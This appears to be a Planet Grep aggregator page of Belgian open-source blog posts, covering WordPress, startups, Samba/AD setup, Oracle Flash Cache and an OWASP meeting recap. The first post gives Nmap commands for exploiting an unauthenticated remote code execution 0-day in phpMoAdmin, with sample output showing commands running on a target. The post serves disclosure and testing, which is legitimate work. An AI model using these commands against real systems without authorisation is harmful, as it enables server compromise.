Subscriptions

Planet Grep is open to all people who either have the Belgian nationality or live in Belgium, and who actively work with or contribute to Open Source/Free software.

About Planet Grep...

Other planets can be found at the Planet Index.

A complete feed is available in a number of syndication formats: RSS 1.0, RSS 2.0, FOAF, and OPML.

The layout of this site was done by Gregory

March 04, 2015

Xavier Mertens

phpMoAdmin 0-day Nmap Script

A 0-day vulnerability was posted on Full-Disclosure this morning. It affects phpMoAdmin, a GUI for MongoDB. Similar to the well-known phpMyAdmin, it allows the DB administrator to perform maintenance tasks on MongoDB databases through a nice web interface. The vulnerability is critical because it allows unauthenticated remote code execution. All details are available in this Full-Disclosure post.

I wrote a quick and dirty Nmap script which tests for the presence of a phpMoAdmin page and tries to exploit the vulnerability. The script can be used as follows:

# nmap -sC --script=http-phpmoadmin \
     --script-args='http-phpmoadmin.uri=/moadmin.php \
                    http-phpmoadmin.cmd=id' \
     <target>

Example of output:

# nmap -sC --script=http-phpmoadmin --script-args='http-phpmoadmin.uri=/moadmin.php' \
-p 80 www.target.com

Starting Nmap 6.47SVN ( http://nmap.org ) at 2015-03-04 09:45 CET
Nmap scan report for www.target.com (192.168.2.1)
Host is up (0.027s latency).
rDNS record for 192.168.2.1: www.target.com
PORT STATE SERVICE
80/tcp open http
| http-phpmoadmin: 
|_Output for 'id':uid=33(www-data) gid=33(www-data) groups=33(www-data)

Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds

The script is available here. Install it in your “$NMAP_HOME/share/nmap/scripts/” directory and enjoy!

by Xavier at March 04, 2015 09:10 AM

March 03, 2015

Lionel Dricot

How could it be otherwise?

The twists of human psychology mean that, from cycling to politics, one can be an honest cheat, a liar who tells the truth, and a corrupt man acting in good faith. And what if it were not men who corrupt institutions, but institutions which, by their very construction, leave men no choice?

I have always imagined that a young cyclist just starting out must be an idealist. He must have heard about doping. Perhaps even seen it. But he would do without it, even if it meant not always winning. His talent would make up for it. And anyway, winning a single stage was the goal of his career, not racking up several grand tours.

As time went on, he ran into difficulties. Opportunities came up. Following some advice and a head cold, a medicine helped him a great deal in the next day's race.

Was it doping? Certainly not. And anyway, what is doping, deep down? An arbitrary list of substances? Without the medicine, his performance collapsed. But that substance, combined with a special treatment from the team's soigneur, had an invigorating effect. Without being doping. Not the « real » thing.

And then there was that race. The day before, he felt a little under the weather. But a big sponsorship contract was at stake if he finished in the top ten. There was a bonus that would amply cover the work on the house he had gone into debt for. It was just this once. Not really doping as the newspapers describe it, with big syringes. No, just a little help. Just once.

When the news of his disqualification appeared in the papers, the cyclist burst into tears. No, he had never doped. Not « really ». Not « doped ». It was unfair. Besides, he was one of those who took the fewest substances while still getting results. He was honest. He sincerely believed himself the victim of an injustice.

No, he was not lying! He was deeply convinced. It was not really doping. Deep down, what is doping anyway? And, between us, did he even have a choice? How could he have done otherwise?

*

After years of political activism, and following a chain of circumstances involving several resignations, here you are, sitting in an office, in your first position as an elected official. You cannot help feeling proud. An idealist, you finally see a way to act, to make the world around you better, more humane, more just.

Your job, you realize very quickly, consists of spending public money. But careful, you are going to do it properly! Like a good manager! Even if this is the first time in your life you have the power to hand out millions, you do not intend to let yourself be dazzled.

On your desk sits a request to subsidize an esoteric music festival.

You have never heard of esoteric music, but something catches your attention: the organizer is none other than a childhood friend! The application is well put together and the festival takes place every year. It looks very good. The request is for only €100,000. A drop in your budget! In short, you see no reason to refuse this to a childhood friend, and you grant the money.

The next day, your nephew tells you he is looking for work as a graphic designer. In the course of the conversation, he mentions that he draws his inspiration from esoteric music. That gives you an idea. You make a quick phone call to your childhood friend to tell him you have approved the subsidy. And you ask whether the festival, now flush with that subsidy, might not need the services of a graphic designer. Your friend asks for your nephew's contact details.

You are satisfied: you have done everyone a favour. You feel useful.

A few weeks later, you receive a request for a similar festival. In all honesty, you refuse. One esoteric music festival is quite enough. Even though, this time, the request comes from a large company specialized in organizing this type of event.

The next day, the director of the production company calls to request a meeting. Once in your office, he asks the reasons for your refusal. You lay them out. The director then announces that he has discovered that the festival you mention is organized by one of your friends. And that it is a shame to favour your friends.

You are flabbergasted! You do not favour your friends. It is just that his festival applied for its subsidy first, for half the amount, and that it takes place every year. Is that not enough?

The director of the production company then offers to buy the company organizing the current festival. So you set up a meeting between your friend and this director.

Your friend objects that the current structure is a non-profit organization. The director then offers to buy the image rights and the name for €50,000. Your friend will also be hired by the company as an organizer and will draw a good salary. You slip in the fact that your nephew is also employed by the association. The director promises to hire him.

The deal is done, and you take part in setting up the whole arrangement, outside your working hours. The director then asks you to send your invoices for the hours you put in on this file. The director himself is willing to pay for « up to 200 hours of work ». You hastily create a company with your spouse in order to issue that invoice at a rate of €100 per hour.

The following year, you discover that the requested subsidy has risen to €200,000. But the festival has grown, that is normal, so you grant it.

Since you earned €20,000 on the previous festival, you realize you are gifted. Is the rate not proportional to the skill? To think that it used to take you a year to earn such a sum! At last you have found your calling, your talent! So you propose to your friend to launch another type of festival, in order to resell that concept as well. This time, you create a company directly with your friend. But your friend creates a non-profit that will subcontract the organization to the company in question, because subsidies cannot be given to a company. Your company is therefore now called « Festival Consult ».

Your friend officially resigns, only to keep performing the same duties as before, but now invoicing his hours through Festival Consult. An excellent idea. What's more, it lets him pay less tax. The large company also asks you for advice on organizing several other festivals, and you can bill for your expertise.

A sensationalist rag suddenly seizes on the affair, and you discover that you stand accused of corruption. Corruption!
You? Never! What a scandal! All you did was put your skills, in your free time, at the service of organizing music festivals.

You do not even understand what you are being accused of. You can only be innocent. Besides, what is corruption? If you had to do it all over again, you cannot even see what you would change! In all honesty, how could you have acted otherwise?

Photo by Coolmonfrere.

Thank you for taking the time to read this pay-what-you-want post. Feel free to support me with a few milliBitcoins or a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE license.


by Lionel Dricot at March 03, 2015 09:45 PM

Frank Goossens

Quick tip; disabling WordPress author pages

I helped build a WordPress site for a not-for-profit and they asked me to disable the author pages. Although I’m sure there are multiple plugin-based solutions, I ended up simply adding an author.php to my (child) theme with this in it;

<?php
// Permanently redirect any author page to the site root.
header("HTTP/1.1 301 Moved Permanently");
header("Location: /");
exit;
?>

As author.php is used for all author pages (if available; otherwise archive.php is used), every attempt to reach an author page will result in a permanent redirect being sent, effectively disabling the author archive. Keeping it simple, stupid!
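
As an aside (my sketch, not from the post): the same effect can be had without a template file, e.g. from functions.php or a small plugin, using WordPress’ template_redirect hook:

<?php
// Redirect author archives to the homepage before any template loads.
add_action( 'template_redirect', function () {
    if ( is_author() ) {
        wp_redirect( home_url( '/' ), 301 );
        exit;
    }
} );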

by frank at March 03, 2015 07:19 PM

March 02, 2015

Wouter Verhelst

NBD 3.9

I just released NBD 3.9

When generating the changelog, I noticed that 3.8 happened two weeks shy of a year ago, which is far too long. As a result, the new release has many new features:

Get it at the usual place.

March 02, 2015 07:39 PM

Dries Buytaert

How much money to raise for your startup? [Flowchart]

From time to time, people ask me how much money to raise for their startup. I've heard other people answer that question from "never raise money" to "as little as you need" to "as much as you can".

The reason the answers vary so much is because what is best for the entrepreneur is seemingly at odds with what is best for the business. For the entrepreneur, the answer can be as little as necessary to avoid dilution or giving up control. For the business, more money can increase its chances of success. I feel the right answer is somewhere in the middle -- focus on raising enough money, so the company can succeed, but make sure you still feel good about how much control or ownership you have.

But even "somewhere in the middle" is a big spectrum. What makes this so difficult is that it is all relative to your personal risk profile, the quality of the investors you're attracting, the market conditions, the size of the opportunity, and more. There are a lot of parameters to balance.

I created the flowchart below (full-size image) to help you answer the question. This flowchart is only a framework -- it can't take into account all decision-making parameters. The larger the opportunity and the better the investors, the more I'd be willing to give up. It's better to have a small part of something big, than to have a big part of something small.

How much money to raise for your startup

Some extra details about the flowchart:

  • In general, it is good to have 18 months of runway. It gives you enough time to figure out how to get your company to the next level, but still keeps the pressure on.
  • Add 6 months of buffer to handle unexpected bumps or budgeting oversights.
  • If more money is available, I'd take it as long as you don't give away too much of your company. As a starting point for how much control to give up, I use the following formula: 30% - (5% x number of the round). So if you are raising your series A (round 1), don't give away more than 25% (30 - (5 x 1)). If you are raising your series B (round 2), don't give away more than 20% (30 - (5 x 2)). If you start with 50% of the shares, using this formula you'll still have roughly 20% of the company after 5 rounds (depending on other dilutive events such as option pool increases), as the quick sketch below illustrates.
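
A purely illustrative PHP sketch of that rule of thumb (the function name is mine, not from the post):

<?php
// Rule of thumb from above: give away at most 30% - (5% x round number).
function max_give_away(int $round): float {
    return 0.30 - 0.05 * $round;
}

// Start from 50% founder ownership and apply the cap for rounds 1-5.
$ownership = 0.50;
for ($round = 1; $round <= 5; $round++) {
    $ownership *= 1 - max_give_away($round);
    printf("After round %d: %.1f%%\n", $round, $ownership * 100);
}
// Ends at roughly 21.8% after round 5, matching the "roughly 20%" above.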

My view is that of an entrepreneur who has raised over $120 million for one startup. If you're interested in the view of an investor who has funded many startups, check out Michael Skok's post. Michael Skok is Acquia's lead investor and a member of Acquia's board of directors. We both tried to answer the question from our own unique viewpoint.

by Dries at March 02, 2015 01:52 PM

February 28, 2015

Lionel Dricot

The end of advertising at Apple?

Unless you live on another planet, you cannot have missed the announcement Tim Cook made during Apple's latest keynote. The least one can say is that Apple knows how to create buzz. And whether you are an Apple fanboy or, on the contrary, deeply outraged by this announcement, clearly no one can remain indifferent.

Because, despite record revenue, many analysts had singled out 2016 as the year of greatest danger for the Cupertino firm.

After Microsoft's definitive acquisition of Cyanogenmod and the compatibility mode announced in Windows 11, Android has established itself for good as the reference mobile platform, from watches to giant televisions, by way of e-readers and computers. After Google's Chromebooks, Amazon's Kindles and Samsung's televisions, it is now Microsoft's turn to make itself 100% compatible with Android applications.

A godsend for developers, who now only need to develop for a single platform? No, because one platform still holds out against the invader: Apple. Once the developers' darling, it is now subtly being deserted. It is no longer rare to find applications that run on Android with no equivalent on the iPhone, something unthinkable only two years ago.

Apple in difficulty and losing momentum? Even if that weakness is only relative, Google could not pass up the opportunity to deal its adversary a fatal blow. Breaking the tacit non-aggression truce, the lawyers of the Mountain View giant decided to sue Apple for unlawful use of several patents, patents mostly covering the display of advertising in mobile applications and app stores. The idea is very simple: deprive Apple of a substantial part of its revenue while forcing it to pay a hefty fine.

But Tim Cook's response the day before yesterday left the Internet speechless.

From now on, advertisements will quite simply no longer be accepted in App Store applications. Safari will ship with an ad blocker enabled by default. A hurricane in the mobile world. A genuine revolution for the entire software industry.

« Apple's mission is to offer the best experience to its users. An experience of comfort, luxury and productivity, declared Tim Cook, avoiding any direct reference to the ongoing litigation. Advertising does not meet those criteria. Worse, most applications that embed advertising do so with the aim of degrading the experience in order to convince the user to switch to the paid version. »

But the firm does not intend to stop there.

« We are progressively going to introduce a subscription that will give free access to all the applications in the App Store, without any restriction. Application authors will receive a percentage of that subscription based on the number of users and the usage of their applications. We hope in this way to create a system that is fairer and more interesting for small developers, but also simpler and more efficient for users, who can install and uninstall as they need. We are thus continuing the Pay Once and Play logic introduced in 2015. »

For most content publishers who live off advertising, the news is a catastrophe. Some press organizations are even considering taking Apple to court. But as Tim Cook explained, alternatives exist.

« For years, Apple products have automatically blocked intrusion attempts and the installation of malicious software. Technically, advertising can be seen as the installation of malicious software in the user's brain. From an ethical standpoint, a company whose vocation is to serve its users cannot not block it. »

« As for websites that live off advertising, we encourage them to develop a dedicated application. That will let them collect a percentage of the App Store subscriptions taken out by their users. They will then be able to concentrate on satisfying their users rather than the middlemen of the advertising world. »

On Twitter, reactions are running wild, and the most cynical have of course pointed out the hypocrisy: Apple is a company with particularly well-oiled marketing, whose advertisements are on display in every major city. Apple's official Twitter account replied:

There’s a thin line between informations and advertising.

Our goal is to ensure that our communication is like our product: efficient, elegant, useful and never intrusive.

Be that as it may, this is news that will certainly shake things up and that could, in time, prove beneficial for users.

Photo by Mike Deerkoski.

Thank you for taking the time to read this pay-what-you-want post. Feel free to support me with a few milliBitcoins or a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE license.


by Lionel Dricot at February 28, 2015 05:20 PM

Frank Goossens

More goodness in wordpress.org plugin repo updates

Seems like the wordpress.org plugin pages, after recent improvements to the ratings logic, now got an even more important update: they now use “active installations” as the most important metric (as has been done on drupal.org module pages for years), with the total number of downloads relegated to the stats page.

That stats page got a face-lift as well, featuring a graph of the active versions:

autoptimize wp.org plugin page

In case you’re wondering what the source of that “active installations” data is, I was too and reached out to plugin-master Otto (Samuel Wood, who replied;

[The source data comes from] plugin update checks. Every WP install asks for update checks every 12 hours or so. We store a count of that info.

by frank at February 28, 2015 08:51 AM

February 26, 2015

Xavier Mertens

The Evil CVE: CVE-666-666 – “Report Not Read”

That Escalated Quickly
I had an interesting discussion with a friend this morning. He explained that, when he conducts a pentest, he sometimes does not hesitate to add to his report a specific finding about the lack of attention given to previous reports. If some companies are motivated by good intentions and ask for regular pentests of their infrastructure or of a specific application, what if they don't even seem to read the report and take it into account to improve their security level? What if the same security issues are discovered during the next tests? This demotivates the pentester and costs a lot of money for nothing.

The idea of the “evil” CVE popped up during our chat. What about a specific CVE number to report the issue of not reading previous reports? As defined by Wikipedia, the “Common Vulnerabilities and Exposures” (CVE) system provides a reference method for publicly known information-security vulnerabilities and exposures. And a vulnerability can be defined as a weakness in a product or infrastructure that could allow an attacker to compromise the integrity, availability, or confidentiality of that product or infrastructure.

Based on this definition, failing to read the previous pentest report and to take the appropriate corrective actions it lists is a new vulnerability! A good pentest report should contain vulnerabilities and mitigations to remove (or reduce) the associated risks. It is foolish not to read the report and apply the mitigations, even more so when some of them can be implemented quickly (and sometimes cheaply). Think about the evil CVE-666-666 while writing your future reports! Note that the goal is not to blame the customer (who also pays you!) but to educate them.

by Xavier at February 26, 2015 08:41 PM

Wouter Verhelst

Dear non-Belgian web developer,

Localization in the web context is hard, I know. To make things easier, it may seem like a good idea to use GeoIP to detect what country an IP is coming from and default your localization based on that. While I disagree with that premise, this blog post isn't about that.

Instead, it's about the fact that most of you get something wrong about this little country. I know, I know. If you're not from here, it's difficult to understand. But please get this through your head: Belgium is not a French-speaking country.

That is, not entirely. Yes, there is a large group of French-speaking people who live here. Mostly in the south. But if you check the numbers, you'll find that there are, in fact, more people in Belgium who speak Dutch rather than French. Not by a very wide margin, mind you, but still by a wide enough margin to be significant. Wikipedia claims the split is 59%/41% Dutch/French; I don't know how accurate those numbers are, but they don't seem too wrong.

So please, pretty please, with sugar on top: next time you're going to do a localized website, don't assume my French is better than my English. And if you (incorrectly) do, then at the very least make it painfully obvious to me where the "switch the interface to a different language" option in your website is. Because while it's annoying to be greeted in a language that I'm not very good at, it's even more annoying to not be able to find out how to get the correctly-localized version.

Thanks.

February 26, 2015 09:22 AM

Frank Goossens

wordpress.org plugin repo: ratings changed

autoptimize ratings on feb 26th 2015
Yesterday the average rating of all plugins in the wordpress.org repository changed: ratings that were not linked to a review were removed. That means that ratings dating from before approximately November 2012, when reviews were introduced, are no longer taken into account.

This had a positive impact on the average rating of my own plugins, but especially so for Autoptimize. That plugin was largely unsupported before I took over in January 2013 and got some low ratings as a consequence (the average was 4.2 at the time, if I’m not mistaken). With those old numbers now out of the way, the average went from 4.6 to 4.8 overnight. Yay!

by frank at February 26, 2015 06:36 AM

February 25, 2015

Mattias Geniar

Up And Close With PHP 7’s New RFCs

If you're following the development of PHP 7, you'll notice a lot of new RFCs (and some old ones that have been revived) popping up again. How do you keep track of them and test their functionality?

The answer always used to be: compile PHP from the latest sources and test it yourself. But that's not very handy, is it?

RFC Watch

Enter the PHP RFC Watch, a very cool side-project of Benjamin Eberlei.

PHP RFC Watch screenshot

It keeps track of the different PHP RFCs, who voted, and how they voted. You can filter on the open RFCs on the right-hand side.

Testing new RFC functionality

The PHP community has been really fortunate to have a tool like 3v4l.org, which allows you to spin up a PHP/HHVM shell to test some PHP code -- free of charge!

And as of a few days ago, there is also support for RFC branches of PHP that you can test!

For instance, want to try out the new Scalar Type Hints in PHP 7? The RFC includes the strict_types option, and you can try it out in an online shell!

<?php
declare(strict_types=1);

// A scalar-type-hinted function; under strict_types, passing "1"
// instead of 1 would throw a TypeError.
function foo(int $n): int {
    return $n + 1;
}

foo(1); // strictly type-checked function call

function foobar() {
    foo(2); // strictly type-checked function call
}

class baz {
    function foobar() {
        foo(3); // strictly type-checked function call
    }
}

This is a really cool resource, I hope more RFC branches make their way to it.

Props to @3v4l_org!

by Mattias Geniar at February 25, 2015 09:27 PM

Frank Goossens

So the state stands in the way of innovation?

In the hip world of startups and self-declared innovators, the state is all too easily dismissed as THE big obstacle to real innovation. And then you read this;

Fundamental innovation takes at least ten to fifteen years, Mazzucato writes, but the attention span of private venture capitalists is five years at most. They only start playing a role once the biggest risks have already been taken by the state. […] But if you keep dismissing the state as a lumbering fool, you will never get anywhere. Initially it is not the invisible hand of the market but the visible hand of the state that points the way. Government is not there merely to prevent market failure. Without the state there would, in many cases, not even be a market.

You can read the full article (built around the research of the Italian economist Mariana Mazzucato, applied to Silicon Valley but also, closer to home, to ASML) on De Correspondent.

by frank at February 25, 2015 12:00 PM

Sébastien Wains

Samba integrated to Active Directory on RHEL7

Tested with Active Directory 2003 and RHEL 7.0

For RHEL 6.0 see here

I assume that the server is correctly set up and that its hostname matches the Active Directory domain. It should also be synchronized via NTP: clock drift can cause issues with Kerberos.

I assume an AD domain "EXAMPLE" (long name: intranet.example.org)

# host -t srv _kerberos._tcp.intranet.example.org
_kerberos._tcp.intranet.example.org has SRV record 0 100 88 srv00a.intranet.example.org.
_kerberos._tcp.intranet.example.org has SRV record 0 100 88 srv00c.intranet.example.org.
_kerberos._tcp.intranet.example.org has SRV record 0 100 88 srv00b.intranet.example.org.

Install the packages:

# yum -y install authconfig samba samba-winbind samba-winbind-clients pam_krb5 krb5-workstation oddjob-mkhomedir nscd adcli ntp

Enable the services at boot:

# systemctl start smb
# systemctl enable smb
# systemctl start winbind
# systemctl enable winbind
# systemctl start oddjobd 
# systemctl enable oddjobd
# systemctl start dbus

Edit /etc/krb5.conf:

[logging]
 default = FILE:/var/log/krb5libs.log
 kdc = FILE:/var/log/krb5kdc.log
 admin_server = FILE:/var/log/kadmind.log

[libdefaults]
 default_realm = INTRANET.EXAMPLE.ORG
 dns_lookup_realm = true
 dns_lookup_kdc = true
 ticket_lifetime = 24h
 renew_lifetime = 7d
 forwardable = true

[realms]
 EXAMPLE.COM = {
  kdc = kerberos.example.com
  admin_server = kerberos.example.com
 }

 INTRANET.EXAMPLE.ORG = {
 }

[domain_realm]
 .example.com = EXAMPLE.COM
 example.com = EXAMPLE.COM
 intranet.example.org = INTRANET.EXAMPLE.ORG
 .intranet.example.org = INTRANET.EXAMPLE.ORG

Test Kerberos:

# kinit username@INTRANET.EXAMPLE.ORG
# klist

username should be a domain admin in the Active Directory.

klist should give this kind of output:

Ticket cache: FILE:/tmp/krb5cc_0
Default principal: username@INTRANET.EXAMPLE.ORG

Valid starting       Expires              Service principal
02/25/2015 15:23:30  02/26/2015 01:23:30  krbtgt/INTRANET.EXAMPLE.ORG@INTRANET.EXAMPLE.ORG
    renew until 03/04/2015 15:23:28

Delete the Kerberos ticket you just initialized:

# kdestroy

Edit /etc/samba/smb.conf:

[global]
workgroup = EXAMPLE
realm = INTRANET.EXAMPLE.ORG
security = ads
idmap uid = 10000-19999
idmap gid = 10000-19999
idmap config EXAMPLE:backend = rid
idmap config EXAMPLE:range = 10000000-19999999
;winbind enum users = no
;winbind enum groups = no
;winbind separator = +
winbind use default domain = yes
winbind offline logon = false
template homedir = /home/EXAMPLE/%U
template shell = /bin/bash

    server string = Samba Server Version %v

    log file = /var/log/samba/log.%m
    log level = 10
    max log size = 50
    passdb backend = tdbsam

[share]
    path = /home/share
    comment = Some cool directory
    writable = yes
    browseable = yes
    # there's a trust between EXAMPLE and EXAMPLE2
    valid users = username EXAMPLE2\username
    directory mask = 0777
    create mask = 0777

Restart Samba:

# systemctl restart smb

Join the domain:

# net join -S EXAMPLE -U username

It should work and you can then get information regarding the join:

# net ads info
LDAP server: 192.168.0.1
LDAP server name: SRV00C.intranet.example.org
Realm: INTRANET.EXAMPLE.ORG
Bind Path: dc=INTRANET,dc=EXAMPLE,dc=ORG
LDAP port: 389
Server time: Wed, 25 Feb 2015 15:27:05 CET
KDC server: 192.168.0.1
Server time offset: 0

Create the directory for AD users:

# mkdir /home/EXAMPLE/
# chmod 0777 /home/EXAMPLE/

Restart Winbind:

# systemctl restart winbind

Sources:

redhat.com

February 25, 2015 05:00 AM

February 24, 2015

Xavier Mertens

OWASP Belgium Chapter Meeting February 2015 Wrap-Up

Jim on stage
Tonight the first Belgian OWASP chapter meeting of 2015 was organized in Leuven. With the SecAppDev event also organized in Belgium last week, many nice speakers were in the country, so it was a good opportunity to ask them to present a talk at a chapter meeting. As usual, Seba opened the event and reviewed the latest OWASP Belgium news before giving the floor to the speakers.

The first speaker was Jim DelGrosso from Cigital. Jim talked about “Why code review and pentests are not enough”. His key message was the following: penetration tests are useful but they can’t find all types of vulnerabilities, which is why other checks are required. So how do we improve our security tests? Before conducting a penetration test, a good idea is to simply check the design of the target application: some flaws can already be found at that stage! Here it is very important to make the difference between a “bug” and a “flaw”. Bugs are related to implementation while flaws are “by design”. The ratio between bugs and flaws is almost 50/50. Jim reviewed some examples of bugs: XSS or buffer overflows are nice ones. In short, a bug is a coding problem. And the flaws? Examples are weak, missing or wrong security controls (e.g. a security feature that can be bypassed by the user). But practically, how do we find them? Are tools available? To find bugs, the classic code review process is used (we look for patterns). Pentests can also find bugs, but this overlaps with finding flaws. Finally, a good analysis of the architecture will focus on flaws. Jim reviewed more examples just to be sure that the audience got the difference between the two problems:

Then Jim asked the question “How are we doing?” regarding software security. The OWASP Top 10 has been a good reference for most of us for almost ten years now. Jim compared the different versions across the years and demonstrated that the same attacks remain while their severity levels change regularly. Seven of them have been the same for ten years! Does that mean they are very hard to solve? Do we need new tools? Some vulnerabilities dropped or disappeared because developers today use frameworks which are better protected. Others are properly detected and blocked; a good example is XSS attacks being blocked by modern browsers. Something new arrived in 2013: the use of components with known vulnerabilities (dependencies in apps).

So practically, how do we find flaws? Jim recommends performing code reviews. Penetration tests will find fewer flaws and will require more time. But we need something else: a new type of analysis focusing on how we design a system, and a different set of checklists. That’s why the IEEE Computer Society started a project to expand its presence in security. They started with an initial group of contributors and built a list of points to avoid the classic top-10 security flaws:

Heartbleed is a nice example of how integrating external components may increase your attack surface. In this case, the openssl library is used to implement new features (cryptography) but it also introduced a bug. To conclude his presentation, Jim explained three ways to find flaws:

A very interesting approach and a new way of testing your applications! After a short break, the second speaker, Aurélien Francillon from EURECOM, presented “An analysis of exploitation behaviours on the web and the role of web hosting providers in detecting them”. To be more precise, the talk was about “web honeypots”. Today, most companies have a corporate website or web applications, often hosted on a shared platform maintained by a hosting provider. How do those providers handle the huge amount of malicious traffic sent and received by their servers? The first part was dedicated to the description of the web honeypot built by EURECOM. The goal was to understand the motivations of web attackers, what they do while and after they exploit a vulnerability on a website, and why attacks are carried out (for fun, profit, damage, etc). There were previous studies, but they lacked this level of detail.
Aurélien on stage

How was the honeypot deployed? Aurélien explained that 500 vulnerable websites were deployed on the Internet, using 100 domains registered with five subdomains each. They were hosted at nine of the biggest hosting providers. Each website ran five common CMSes with classic vulnerabilities. Once deployed, data was collected for 100 days. Each website acted as a proxy and its traffic was redirected to the real web apps running on virtual machines. Why? Virtual machines are easy to reinstall, they allow full logging, and it’s easy to tailor and limit the attacker’s privileges. The amount of data collected was impressive:

Aurélien gave some facts about the different phases of an attack:

Based on the statistics, some trends were confirmed:

The second part of the presentation focused on hosting providers. Do they complain? How do they detect malicious activity (if they detect it at all)? Do they care about security? Today hosting solutions are cheap and there are millions of websites maintained by inexperienced owners. This makes the attack surface very large. Hosting providers should play a key role in helping users. Is that the case? Alas, according to Aurélien, no! To perform the tests, EURECOM registered multiple shared hosting accounts at multiple providers, deployed web apps and simulated attacks:

In the first phase, they just observed the provider's reaction. In the second, they contacted the provider to report an abuse (one real and one illegitimate). Twelve providers were tested from the top US-based ones and ten from other regions (Europe, Asia, …). What were the results?
  • At registration time, some did some screening (like phone calls), some verified the provided data and only three performed a 1-click registration (no check at all).
  • Some have URL blacklisting in place.
  • Filtering occurs at OS level (e.g. to prevent callbacks on suspicious ports) but the detection rate is low in general.
  • About the abuse reports: 50% never replied; among the others, 64% replied within one day. A wide variety of reactions.
  • Some providers offer (read: sell) security add-ons. Five out of six did not detect anything. One detected but never notified the customer.
To conclude the research: most providers fail to provide correct security services, and services are cheap, so do not expect good service. Note that the provider names were not disclosed by Aurélien!
It was a very nice event to start the year 2015! Good topics and good speakers!

by Xavier at February 24, 2015 10:28 PM

Mattias Geniar

Firefox 36 Fully Supports HTTP/2 Standard

Now that's fast.

Support for the full HTTP/2 protocol. HTTP/2 enables a faster, more scalable, and more responsive web.

Just 2 weeks after the HTTP/2 spec was declared final, Firefox 36 ships with the updated HTTP/2 protocol. Well played, Mozilla.

by Mattias Geniar at February 24, 2015 09:28 PM

Wim Coekaerts

Oracle Linux and Database Smart Flash Cache

One sometimes overlooked cool feature of the Oracle Database running on Oracle Linux is called Database Smart Flash Cache.

You can find an overview of the feature in the Oracle Database Administrator's Guide. Basically, if you have flash devices attached to your server, you can use this flash memory to increase the size of the buffer cache. Instead of aging blocks out of the buffer cache and having to go back to reading them from disk, they move to the much, much faster flash storage, which acts as a secondary fast buffer cache (for reads, not writes).

Some scenarios where this is very useful: you have huge tables and huge amounts of data, a very, very large database with tons of query activity (let's say many TB), and your server is limited to a relatively small amount of main RAM (let's say 128 or 256G). In this case, if you were to purchase and add a flash storage device of 256G or 512G (for example), you could attach this device to the database with the Database Smart Flash Cache feature and increase the buffer cache of your database from 100G or 200G to 300-700G on that same server. In a good number of cases this will give you a significant performance improvement without having to purchase a new server that handles more memory, or flash storage large enough for your many TB of data to live in flash instead of on rotational storage.

It is also incredibly easy to configure.

1. Install Oracle Linux (I installed Oracle Linux 6 with UEK3)
2. Install Oracle Database 12c (this would also work with 11g; I installed 12.1.0.2.0 EE)
3. Add a flash device to your system (for the example I just added a 1GB device showing up as /dev/sdb)
4. Attach the storage to the database in sqlplus

Done.

$ ls /dev/sdb
/dev/sdb

$ sqlplus '/ as sysdba'

SQL*Plus: Release 12.1.0.2.0 Production on Tue Feb 24 05:46:08 2015

Copyright (c) 1982, 2014, Oracle.  All rights reserved.


Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics and Real Application Testing options

SQL>  alter system set db_flash_cache_file='/dev/sdb' scope=spfile;

System altered.

SQL> alter system set db_flash_cache_size=1G scope=spfile;

System altered.

SQL> shutdown immediate;
Database closed.
Database dismounted.
ORACLE instance shut down.

SQL> startup
ORACLE instance started.

Total System Global Area 4932501504 bytes
Fixed Size		    2934456 bytes
Variable Size		 1023412552 bytes
Database Buffers	 3892314112 bytes
Redo Buffers		   13840384 bytes
Database mounted.
Database opened.

SQL> show parameters flash

NAME				     TYPE	 VALUE
------------------------------------ ----------- ------------------------------
db_flash_cache_file		     string	 /dev/sdb
db_flash_cache_size		     big integer 1G
db_flashback_retention_target	     integer	 1440

SQL> select * from v$flashfilestat; 

FLASHFILE#
----------
NAME
--------------------------------------------------------------------------------
     BYTES    ENABLED SINGLEBLKRDS SINGLEBLKRDTIM_MICRO     CON_ID
---------- ---------- ------------ -------------------- ----------
	 1
/dev/sdb
1073741824	    1		 0		      0 	 0

You can get more information on configuration and guidelines/tuning here. If you want selective control over which tables can or will use the Database Smart Flash Cache, you can use the ALTER TABLE command (see here, specifically the STORAGE clause). By default, tables are aged out into the flash cache, but if you don't want certain tables to be cached you can use the NONE option:

alter table foo storage (flash_cache none);

This feature can really make a big difference in a number of database environments and I highly recommend taking a look at how Oracle Linux and Oracle Database 12c can help you enhance your setup. It's included with the database running on Oracle Linux.

Here is a link to a white paper that gives a bit of a performance overview.

by Wcoekaer-Oracle at February 24, 2015 08:07 PM

Dries Buytaert

5 things a government can do to grow its startup ecosystem

Building a successful company is really hard. It is hard no matter where you are in the world, but the difficulty is magnified in Europe, where people are divided by geography, regulation, language and cultural prejudice. If governments can give European startups a competitive advantage, that could go a long way toward offsetting some of the disadvantages. In this post, I'm sharing some rough ideas for what governments could do to encourage a thriving startup ecosystem. It's my contribution to the Belgian startup manifesto (#bestartupmanifesto).

  1. Governments shouldn't obsess too much about making it easier to incorporate a company; while it is certainly nice when governments cut red tape, great entrepreneurs aren't going to be held back by some extra paperwork. Getting a company off the ground is by no means the most difficult part of the journey.
  2. Governments shouldn't decide what companies deserve funding or don't deserve funding. They will never be the best investors. Governments should play to their strength, which is creating leverage for all instead of just for a few.
  3. Governments can do quite a bit to extend a startup's runway (to compensate for the lack of funding available in Belgium). Relatively simple tax benefits result in less need for venture capital:
    • No corporate income taxes on your company for the first 3 years or until 1 million EUR in annual revenue.
    • No employee income tax or social security contributions for the first 3 years or until you hit 10 employees. Make hiring talent as cheap as possible; two employees for the price of one. (The cost of hiring an employee would effectively be the net income for the employee. The employee would still get a regular salary and social benefits.)
    • Loosen regulations on hiring and firing employees. Three-month notice periods shackle the growth of startups. Governments can provide more flexibility for startups to hire and fire fast; two-week notice periods for both incoming and outgoing employees. Employees who join a startup are comfortable with this level of job insecurity.
  4. Create "innovation hubs" that make neighborhoods more attractive to early-stage technology companies. Concentrate as many technology startups as possible in fun neighborhoods. Provide rent subsidies, free wifi and make sure there are great coffee shops.
  5. Build a culture of entrepreneurship. The biggest thing holding back a thriving startup community is not regulation, language, or geography, but a cultural prejudice against both failure and success. Governments can play a critical role in shaping a country's culture and creating an entrepreneurial environment where both failures and successes are celebrated, and where people are encouraged to better themselves economically through hard work and risk-taking. In the end, entrepreneurship is a state of mind.

by Dries at February 24, 2015 07:15 PM

